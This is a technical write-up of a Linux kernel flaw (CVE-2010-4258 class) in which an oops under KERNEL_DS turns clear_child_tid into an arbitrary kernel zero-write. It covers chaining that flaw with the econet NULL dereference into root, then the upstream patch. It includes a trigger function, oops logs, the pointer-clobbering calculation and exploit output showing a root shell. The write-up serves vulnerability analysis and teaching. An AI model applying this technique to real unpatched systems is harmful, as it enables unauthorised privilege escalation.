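Nelson Elhage recently found a design flaw in the kernel that can turn bugs previously usable only for denial of service (DoS) into privilege-escalation bugs.
When a process is forked, copy_process does the following: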
static struct task_struct *copy_process(unsigned long clone_flags,
                                        unsigned long stack_start,
                                        struct pt_regs *regs,
                                        unsigned long stack_size,
                                        int __user *child_tidptr,
                                        struct pid *pid,
                                        int trace)
{
        /* ... */
        p->set_child_tid = (clone_flags & CLONE_CHILD_SETTID) ? child_tidptr : NULL;
        /*
         * Clear TID on mm_release()?
         */
        p->clear_child_tid = (clone_flags & CLONE_CHILD_CLEARTID) ? child_tidptr : NULL;
        /* ... */
}
When the CLONE_CHILD_CLEARTID flag is set, copy_process stores the child_tidptr pointer in p->clear_child_tid.
The key point is that child_tidptr comes from user space: calling the clone system call with the CLONE_CHILD_CLEARTID flag
passes child_tidptr to the kernel:
clone((int (*)(void *))trigger,
      (void *)((unsigned long)newstack + 65536),
      CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
      &fildes, NULL, NULL, child_tidptr);
When a process exits, do_exit() does the following:
NORET_TYPE void do_exit(long code)
{
        /* ... */
        exit_mm(tsk);
        /* ... */
}
static void exit_mm(struct task_struct * tsk)
{
        struct mm_struct *mm = tsk->mm;
        struct core_state *core_state;
        mm_release(tsk, mm);
        /* ... */
}
void mm_release(struct task_struct *tsk, struct mm_struct *mm)
{
        /* ... */
        if (tsk->clear_child_tid) {
                if (!(tsk->flags & PF_SIGNALED) &&
                    atomic_read(&mm->mm_users) > 1) {
                        /*
                         * We don't check the error code - if userspace has
                         * not set up a proper pointer then tough luck.
                         */
                        put_user(0, tsk->clear_child_tid);
                        sys_futex(tsk->clear_child_tid, FUTEX_WAKE,
                                  1, NULL, NULL, 0);
                }
                tsk->clear_child_tid = NULL;
        }
}
When clear_child_tid is set, the following is executed:
put_user(0, tsk->clear_child_tid);
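put_user writes 0 to the memory that tsk->clear_child_tid points to. tsk->clear_child_tid
is user-controlled, so an arbitrary user-space address can be zeroed. This was a security bug in its own right, and the kernel developers
have already patched it: http://lkml.org/lkml/2009/7/31/76.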
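The clearing itself can be observed harmlessly from user space. Below is a minimal sketch, assuming Linux with glibc's clone() wrapper; observe_clear_child_tid, child_fn and tid_word are names made up for this illustration and do not come from any exploit. child_tidptr points at an ordinary variable in our own address space, so nothing but our own memory is touched.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>

#define CHILD_STACK_SIZE 65536

/* The word the kernel is asked to clear; volatile because the kernel
 * changes it behind the compiler's back. */
static volatile int tid_word;

/* Child body: return at once so the kernel runs its exit path. */
static int child_fn(void *arg)
{
    (void)arg;
    return 0;
}

/*
 * Start a child that shares our address space (CLONE_VM), wait for it,
 * and return the value left in tid_word, or -1 if setup failed.
 */
int observe_clear_child_tid(void)
{
    char *stack = malloc(CHILD_STACK_SIZE);
    pid_t pid;
    int status;

    if (stack == NULL)
        return -1;

    tid_word = 0x41414141;   /* sentinel the kernel should overwrite */

    /* The stack grows down on x86, so pass the top of the buffer. */
    pid = clone(child_fn, stack + CHILD_STACK_SIZE,
                CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
                NULL, NULL, NULL, (int *)&tid_word);
    if (pid < 0) {
        free(stack);
        return -1;
    }

    /* Once waitpid() returns, the child has been through mm_release(). */
    if (waitpid(pid, &status, 0) != pid) {
        free(stack);
        return -1;
    }
    assert(WIFEXITED(status));

    free(stack);
    return tid_word;
}
```

Calling observe_clear_child_tid() from main() and printing the result should show that the sentinel has been replaced by 0. CLONE_VM matters here: without it the child has its own mm, and the mm_users > 1 test in mm_release skips the write.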
Let's look at how put_user is implemented:
arch/x86/include/asm/uaccess.h:
#define put_user(x, ptr) \
({ \
int __ret_pu; \
__typeof__(*(ptr)) __pu_val; \
__chk_user_ptr(ptr); \
might_fault(); \
__pu_val = x; \
switch (sizeof(*(ptr))) { \
case 1: \
__put_user_x(1, __pu_val, ptr, __ret_pu); \
break; \
case 2: \
__put_user_x(2, __pu_val, ptr, __ret_pu); \
break; \
case 4: \
__put_user_x(4, __pu_val, ptr, __ret_pu); \
break; \
case 8: \
__put_user_x8(__pu_val, ptr, __ret_pu); \
break; \
default: \
__put_user_x(X, __pu_val, ptr, __ret_pu); \
break; \
} \
__ret_pu; \
})
Depending on the size of the type ptr points to, the __put_user_x macros copy 1, 2, 4 or 8 bytes of x to the memory ptr points to:
#define __put_user_x(size, x, ptr, __ret_pu) \
asm volatile("call __put_user_" #size : "=a" (__ret_pu) \
: "0" ((typeof(*(ptr)))(x)), "c" (ptr) : "ebx")
It does two things: it loads x into eax and ptr into ecx. It then calls __put_user_4, because clear_child_tid
points to an int:
struct task_struct {
        /* ... */
        int __user *set_child_tid;      /* CLONE_CHILD_SETTID */
        int __user *clear_child_tid;    /* CLONE_CHILD_CLEARTID */
        /* ... */
};
arch/x86/lib/putuser.S:
ENTRY(__put_user_4)
        ENTER
        mov TI_addr_limit(%_ASM_BX),%_ASM_BX
        sub $3,%_ASM_BX
        cmp %_ASM_BX,%_ASM_CX
        jae bad_put_user
3:      movl %eax,(%_ASM_CX)
        xor %eax,%eax
        EXIT
ENDPROC(__put_user_4)
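_ASM_BX and _ASM_CX are ebx and ecx on 32-bit, rbx and rcx on 64-bit.
TI_addr_limit(%_ASM_BX) loads the current thread's address-space limit (addr_limit) into ebx, and the address to be written is compared against it.
If the address is at or above the limit minus 3, no copy takes place; otherwise the value in eax is stored to the memory ecx points to, which is what (%_ASM_CX) denotes.
put_user itself is fine, but consider an oops that happens while the following is in effect: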
set_fs(KERNEL_DS);
arch/x86/include/asm/uaccess.h:
#define set_fs(x) (current_thread_info()->addr_limit = (x))
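set_fs sets the current thread's address-space limit to KERNEL_DS, which defeats the pointer check in put_user, so a zero can be written to an arbitrary
kernel address. Exploiting this requires that set_fs(KERNEL_DS) be in effect when the oops occurs; oopses triggered by some ordinary kernel bugs satisfy this condition.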
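To make the effect of addr_limit concrete, here is a small model of the range check in __put_user_4, written as ordinary user-space C. It is only a sketch: the two limit values assume 32-bit x86 with the default 3G/1G split, and model_put_user_4_check and the MODEL_* constants are made-up names, not kernel symbols.

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>

/* Assumed 32-bit x86 values with the default 3G/1G split. */
#define MODEL_USER_DS   UINT32_C(0xC0000000)  /* PAGE_OFFSET */
#define MODEL_KERNEL_DS UINT32_C(0xFFFFFFFF)  /* -1UL */

/*
 * Model of the range check in __put_user_4: the store is refused when
 * addr >= addr_limit - 3 (unsigned compare, like 'jae').
 * Returns 0 if the store would be performed, -EFAULT otherwise.
 */
int model_put_user_4_check(uint32_t addr_limit, uint32_t addr)
{
    assert(addr_limit >= 3);   /* keeps the subtraction from wrapping */
    if (addr >= addr_limit - 3)
        return -EFAULT;
    return 0;
}
```

With MODEL_USER_DS as the limit, a kernel address such as 0xe1a123af is rejected with -EFAULT, while a typical user address such as 0x08048000 is accepted. With MODEL_KERNEL_DS the same kernel address passes the check, which is exactly the situation an oops under set_fs(KERNEL_DS) leaves behind.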
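Let's see how to combine this with a NULL pointer dereference bug in econet to escalate privileges.
For background on exploiting NULL pointer dereferences, see a paper I wrote earlier. Recent kernels restrict mapping of low memory: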
wzt@program:~/kernel$ cat /proc/sys/vm/mmap_min_addr
65536
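So a NULL pointer bug on its own is only good for DoS, but the flaw described above can turn that DoS into a local privilege escalation. Dan Rosenberg wrote an
exploit demonstrating this. First, let's see how the econet NULL pointer bug arises: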
static int econet_sendmsg(struct kiocb *iocb, struct socket *sock,
                          struct msghdr *msg, size_t len)
{
        struct sock *sk = sock->sk;
        struct sockaddr_ec *saddr = (struct sockaddr_ec *)msg->msg_name;
        /* ... */
        eb->cookie = saddr->cookie;
        /* ... */
}
saddr is controlled from user space and can therefore be NULL, in which case the saddr->cookie access causes an oops. The following code triggers it:
int trigger(int * fildes)
{
        int ret;
        struct ifreq ifr;
        memset(&ifr, 0, sizeof(ifr));
        strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
        ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
        if(ret < 0) {
                printf("[*] Failed to set Econet address.\n");
                return -1;
        }
        splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
        splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
        /* Shouldn't get here... */
        exit(0);
}
[ 2724.871624] BUG: unable to handle kernel NULL pointer dereference at 00000008
[ 2724.871629] IP: [<e08423d5>] econet_sendmsg+0x215/0x530 [econet]
[ 2724.871636] *pde = 1fa24067 *pte = 00000000
[ 2724.871639] Oops: 0000 [#1] SMP
[ 2724.871642] last sysfs file: /sys/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A03:00/PNP0C0A:00/power_supply/BAT0/voltage_now
[ 2724.871645] Modules linked in: econet binfmt_misc snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device ppdev parport_pc snd joydev psmouse i2c_piix4 serio_raw soundcore snd_page_alloc lp parport usbhid e1000 hid ahci libahci
[ 2724.871662]
[ 2724.871669] Pid: 1541, comm: exp Not tainted 2.6.35-22-generic #33-Ubuntu /VirtualBox
[ 2724.871671] EIP: 0060:[<e08423d5>] EFLAGS: 00010286 CPU: 0
[ 2724.871674] EIP is at econet_sendmsg+0x215/0x530 [econet]
[ 2724.871676] EAX: ccd3ccc0 EBX: ce06fe14 ECX: ccd3ccd8 EDX: 00000000
[ 2724.871678] ESI: 00000000 EDI: ce06e000 EBP: ce06fd20 ESP: ce06fc84
[ 2724.871680] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068
[ 2724.871682] Process exp (pid: 1541, ti=ce06e000 task=ce194c20 task.ti=ce06e000)
[ 2724.871683] Stack:
[ 2724.871685] ce06fcf8 00000080 c9344000 ce06fcec 00000008 c9344000 00000080 ce06fcf4
[ 2724.871693] <0> 00000080 00000000 ce06fccc ce06fe14 ce06ff1c 0088ecd8 cce86c00 00000000
[ 2724.871697] <0> ce06e000 00000088 ce06fc90 c02193b6 00000002 00000000 00000000 ce06fcec
[ 2724.871702] Call Trace:
[ 2724.871708] [<c02193b6>] ? do_readv_writev+0x146/0x1b0
[ 2724.871713] [<c04e7489>] ? sock_sendmsg+0xd9/0x100
[ 2724.871716] [<c013a194>] ? enqueue_entity+0x174/0x200
[ 2724.871719] [<c04e74e5>] ? kernel_sendmsg+0x35/0x50
[ 2724.871722] [<c04e94e8>] ? sock_no_sendpage+0x68/0x80
[ 2724.871725] [<c04e9480>] ? sock_no_sendpage+0x0/0x80
[ 2724.871728] [<c04e5163>] ? kernel_sendpage+0x43/0x70
[ 2724.871730] [<c04e51d2>] ? sock_sendpage+0x42/0x50
[ 2724.871734] [<c0238097>] ? pipe_to_sendpage+0x87/0x90
[ 2724.871736] [<c04e5190>] ? sock_sendpage+0x0/0x50
[ 2724.871739] [<c02380f4>] ? splice_from_pipe_feed+0x54/0xe0
[ 2724.871741] [<c0238010>] ? pipe_to_sendpage+0x0/0x90
[ 2724.871744] [<c023862c>] ? __splice_from_pipe+0x5c/0x70
[ 2724.871747] [<c0238010>] ? pipe_to_sendpage+0x0/0x90
[ 2724.871749] [<c02386a3>] ? splice_from_pipe+0x63/0x80
[ 2724.871752] [<c0238700>] ? generic_splice_sendpage+0x0/0x30
[ 2724.871755] [<c0238726>] ? generic_splice_sendpage+0x26/0x30
[ 2724.871757] [<c0238010>] ? pipe_to_sendpage+0x0/0x90
[ 2724.871760] [<c0238f7f>] ? do_splice_from+0x5f/0x90
[ 2724.871763] [<c02396e3>] ? do_splice+0xc3/0x210
[ 2724.871766] [<c0226eb9>] ? do_vfs_ioctl+0x79/0x2d0
[ 2724.871768] [<c0239a3d>] ? sys_splice+0xad/0xd0
[ 2724.871771] [<c05c90a4>] ? syscall_call+0x7/0xb
[ 2724.871773] Code: 55 a8 3b 43 0c 72 bf 8b 4b 18 8d 45 d8 31 d2 89 04 24 8b 45 9c 83 e1 40 e8 89 75 ca df 85 c0 0f 84 ad 00 00 00 8b 75 a0 8d 48 18 <8b> 56 08 c7 41 18 e2 04 00 00 89 51 0c 8b 15 40 5a 7c c0 89 51
[ 2724.871796] EIP: [<e08423d5>] econet_sendmsg+0x215/0x530 [econet] SS:ESP 0068:ce06fc84
[ 2724.871800] CR2: 0000000000000008
[ 2724.871802] ---[ end trace 4630cf85b586bf8f ]---
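Because of the mmap_min_addr restriction, the zero page cannot be mmap'ed, so this bug cannot be exploited directly. The write-zero-to-an-arbitrary-kernel-address flaw described above, however, turns the DoS into a privilege escalation.
When do_page_fault runs, the oops message for the NULL pointer dereference is printed first, then execution enters do_exit and from there reaches put_user.
On this path we overwrite the econet_ioctl function pointer in econet_ops so that it points to code mapped in user space beforehand, typically shellcode; a later ioctl call from user space
then executes our shellcode. Note that put_user writes a zero to 4 bytes of memory. If we aimed it directly at the econet_ioctl slot in econet_ops,
the whole pointer would become NULL and the ioctl would just trigger another NULL pointer dereference. The trick is to zero only the top 8 bits of the econet_ioctl address. Zeroing the top 16 or 24 bits would yield an address below mmap_min_addr,
which cannot be mapped, and put_user cannot clear just the top 12 bits because it writes whole bytes, so the top 8 bits are the only option.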
econet_ioctl + 4  +----+  high addresses
                  | e0 |
econet_ioctl + 3  +----+
                  | 84 |
econet_ioctl + 2  +----+
                  | 32 |
econet_ioctl + 1  +----+
                  | a0 |
econet_ioctl      +----+
                  | ...|
econet_ops        +----+  low addresses
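target = econet_ops + 10 * sizeof(void *) - 1, i.e. it points to econet_ioctl + 3. Passing target to put_user clears the top 8 bits of econet_ioctl. Because the write is 4 bytes wide, it also clears the low 3 bytes of the pointer that follows in econet_ops.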
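The byte arithmetic can be checked with a small user-space model. This is a sketch under stated assumptions: the table is a plain byte array standing in for econet_ops on 32-bit x86, slot 9 holds the econet_ioctl address seen in the oops (0xe08432a0), the neighbouring value 0xe0843500 is invented, and all model_* names are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PTR_SIZE   4u   /* sizeof(void *) on 32-bit x86 */
#define OPS_SLOTS 12u   /* size of the model, not of the real struct proto_ops */

/* Store/load a 32-bit value as little-endian bytes, as x86 does. */
static void store_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

static uint32_t load_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Byte offset of the write: the last byte of the slot before next_slot. */
size_t model_target_offset(size_t next_slot)
{
    assert(next_slot >= 1 && next_slot < OPS_SLOTS);
    return next_slot * PTR_SIZE - 1;
}

/* Model of put_user(0, (int *)target): zero four consecutive bytes. */
void model_put_user_zero(uint8_t *table, size_t offset)
{
    assert(offset + 4 <= OPS_SLOTS * PTR_SIZE);
    memset(table + offset, 0, 4);
}

/*
 * Fill slot 9 with the econet_ioctl address and slot 10 with an invented
 * neighbour, apply the write, and report both slots afterwards.
 */
void model_clobber(uint32_t *ioctl_after, uint32_t *next_after)
{
    uint8_t table[OPS_SLOTS * PTR_SIZE] = {0};

    store_le32(table + 9 * PTR_SIZE, UINT32_C(0xe08432a0));
    store_le32(table + 10 * PTR_SIZE, UINT32_C(0xe0843500)); /* hypothetical */

    model_put_user_zero(table, model_target_offset(10));

    *ioctl_after = load_le32(table + 9 * PTR_SIZE);
    *next_after  = load_le32(table + 10 * PTR_SIZE);
}
```

In this model slot 9 ends up as 0x008432a0 and slot 10 keeps only its top byte, so whatever function lives in the following slot is damaged as a side effect.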
First, let's overwrite target once using clone and see what happens:
[ 2725.874923] BUG: unable to handle kernel paging request at 008432a0
[ 2725.874938] IP: [<008432a0>] 0x8432a0
[ 2725.875362] *pde = 00000000
[ 2725.875369] Oops: 0000 [#2] SMP
[ 2725.875376] last sysfs file: /sys/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A03:00/PNP0C0A:00/power_supply/BAT0/voltage_now
[ 2725.875384] Modules linked in: econet binfmt_misc snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device ppdev parport_pc snd joydev psmouse i2c_piix4 serio_raw soundcore snd_page_alloc lp parport usbhid e1000 hid ahci libahci
[ 2725.875432]
[ 2725.875441] Pid: 1537, comm: exp Tainted: G D 2.6.35-22-generic #33-Ubuntu /VirtualBox
[ 2725.876253] EIP: 0060:[<008432a0>] EFLAGS: 00010297 CPU: 0
[ 2725.876261] EIP is at 0x8432a0
[ 2725.876267] EAX: d1244600 EBX: 00000000 ECX: 00000000 EDX: 00000000
[ 2725.876273] ESI: e08433a0 EDI: d1244600 EBP: d78b5f50 ESP: d78b5f30
[ 2725.876279] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068
[ 2725.876287] Process exp (pid: 1537, ti=d78b4000 task=ce1958d0 task.ti=d78b4000)
[ 2725.876292] Stack:
[ 2725.876295] c04e55bd d78b5f64 0000001a c099dc60 00000000 d7a80980 00000000 00000000
[ 2725.876309] <0> d78b5f6c c0226622 00000002 c04e5550 d7a80980 00000005 00000000 d78b5f8c
[ 2725.876322] <0> c0226eb9 00000000 c03d9e40 df698708 d7a80980 00000005 00000000 d78b5fac
[ 2725.876337] Call Trace:
[ 2725.876352] [<c04e55bd>] ? sock_ioctl+0x6d/0x270
[ 2725.876363] [<c0226622>] ? vfs_ioctl+0x32/0xb0
[ 2725.876371] [<c04e5550>] ? sock_ioctl+0x0/0x270
[ 2725.876379] [<c0226eb9>] ? do_vfs_ioctl+0x79/0x2d0
[ 2725.876388] [<c03d9e40>] ? tty_write+0x0/0x210
[ 2725.876396] [<c0227177>] ? sys_ioctl+0x67/0x80
[ 2725.876405] [<c05c90a4>] ? syscall_call+0x7/0xb
[ 2725.876410] Code: Bad EIP value.
[ 2725.876416] EIP: [<008432a0>] 0x8432a0 SS:ESP 0068:d78b5f30
[ 2725.876428] CR2: 00000000008432a0
[ 2725.876435] ---[ end trace 4630cf85b586bf90 ]---
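"EIP is at 0x8432a0" shows that the top 8 bits of econet_ioctl were indeed cleared. All that remains is to map shellcode at 0x8432a0 in user space;
the next ioctl call will then execute it. Since the write can target any kernel address, I replaced econet_ioctl with econet_bind in the original exploit, and exploitation succeeds just the same: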
wzt@wzt-VirtualBox:~/exp$ ./exp
[*] Resolving kernel addresses...
[+] Resolved econet_bind to 0xe1a110c0
[+] Resolved econet_ops to 0xe1a123a0
[+] Resolved commit_creds to 0xc016c830
[+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Calculating target...
[*] target: e1a123af
[*] landing: a110c0
[*] payload: 0xa11000
[*] Triggering payload...
[*] Got root!
# # #
# id
uid=0(root) gid=0(root) 组=0(root)
#
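The landing and payload values printed above follow from simple masking. The sketch below reproduces that arithmetic and also shows why only the top byte can be cleared; it assumes a 4096-byte page and the mmap_min_addr of 65536 shown earlier, and the model_* names are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_MMAP_MIN_ADDR UINT32_C(65536)  /* from /proc/sys/vm/mmap_min_addr */
#define MODEL_PAGE_SIZE     UINT32_C(4096)   /* assumed page size on x86 */

/* Address left after zeroing the top 'nbytes' bytes (1..3) of a 32-bit pointer. */
uint32_t model_landing(uint32_t func_addr, unsigned nbytes)
{
    assert(nbytes >= 1 && nbytes <= 3);
    return func_addr & (UINT32_C(0xFFFFFFFF) >> (8 * nbytes));
}

/* Start of the page containing addr; this is the page that would be mapped. */
uint32_t model_payload_page(uint32_t addr)
{
    return addr & ~(MODEL_PAGE_SIZE - 1);
}

/* Non-zero if the page containing addr lies at or above mmap_min_addr. */
int model_is_mappable(uint32_t addr)
{
    return model_payload_page(addr) >= MODEL_MMAP_MIN_ADDR;
}
```

For econet_bind at 0xe1a110c0, clearing one byte gives the landing address 0xa110c0 inside the page at 0xa11000, matching the exploit output. Clearing two or three bytes gives 0x10c0 and 0xc0, both below mmap_min_addr.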
An official patch has been released:
If a user manages to trigger an oops with fs set to KERNEL_DS, fs is not
otherwise reset before do_exit(). do_exit may later (via mm_release in
fork.c) do a put_user to a user-controlled address, potentially allowing
a user to leverage an oops into a controlled write into kernel memory.
This is only triggerable in the presence of another bug, but this
potentially turns a lot of DoS bugs into privilege escalations, so it's
worth fixing. I have proof-of-concept code which uses this bug along
with CVE-2010-3849 to write a zero to an arbitrary kernel address, so
I've tested that this is not theoretical.
A more logical place to put this fix might be when we know an oops has
occurred, before we call do_exit(), but that would involve changing
every architecture, in multiple places.
Let's just stick it in do_exit instead.
[akpm@linux-foundation.org: update code comment]
Signed-off-by: Nelson Elhage <nelhage@ksplice.com>
Cc: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com>
Cc: <stable@kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
diff --git a/kernel/exit.c b/kernel/exit.c
index 21aa7b3..676149a 100644
--- a/kernel/exit.c
+++ b/kernel/exit.c
@@ -914,6 +914,15 @@ NORET_TYPE void do_exit(long code)
 	if (unlikely(!tsk->pid))
 		panic("Attempted to kill the idle task!");
 
+	/*
+	 * If do_exit is called because this processes oopsed, it's possible
+	 * that get_fs() was left as KERNEL_DS, so reset it to USER_DS before
+	 * continuing. Amongst other possible reasons, this is to prevent
+	 * mm_release()->clear_child_tid() from writing to a user-controlled
+	 * kernel address.
+	 */
+	set_fs(USER_DS);
+
 	tracehook_report_exit(&code);
 
 	validate_creds_for_do_exit(tsk);
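The effect of the patch can be illustrated with a toy model of the exit path. This is a sketch, not kernel code: struct model_task and the model_* functions are hypothetical, the limit values assume 32-bit x86 with the default 3G/1G split, and pointers are kept as plain integers so nothing is actually written.

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>

#define MODEL_USER_DS   UINT32_C(0xC0000000)
#define MODEL_KERNEL_DS UINT32_C(0xFFFFFFFF)

struct model_task {
    uint32_t addr_limit;       /* stands in for thread_info->addr_limit */
    uint32_t clear_child_tid;  /* user-supplied pointer, kept as an integer */
};

/* Same range check as __put_user_4: 0 means the store would happen. */
static int model_put_user_4(const struct model_task *t, uint32_t addr)
{
    return (addr >= t->addr_limit - 3) ? -EFAULT : 0;
}

/*
 * Model of do_exit() -> mm_release(). 'patched' selects whether the
 * set_fs(USER_DS) added by the patch runs first. Returns the put_user
 * result, or 0 when no clear_child_tid pointer is set.
 */
int model_do_exit(struct model_task *t, int patched)
{
    assert(t != 0);
    if (patched)
        t->addr_limit = MODEL_USER_DS;
    if (t->clear_child_tid == 0)
        return 0;
    return model_put_user_4(t, t->clear_child_tid);
}
```

Starting from a task that oopsed with addr_limit left at MODEL_KERNEL_DS and clear_child_tid set to a kernel address such as 0xe1a123af, the unpatched path returns 0 (the zero would be written), while the patched path returns -EFAULT.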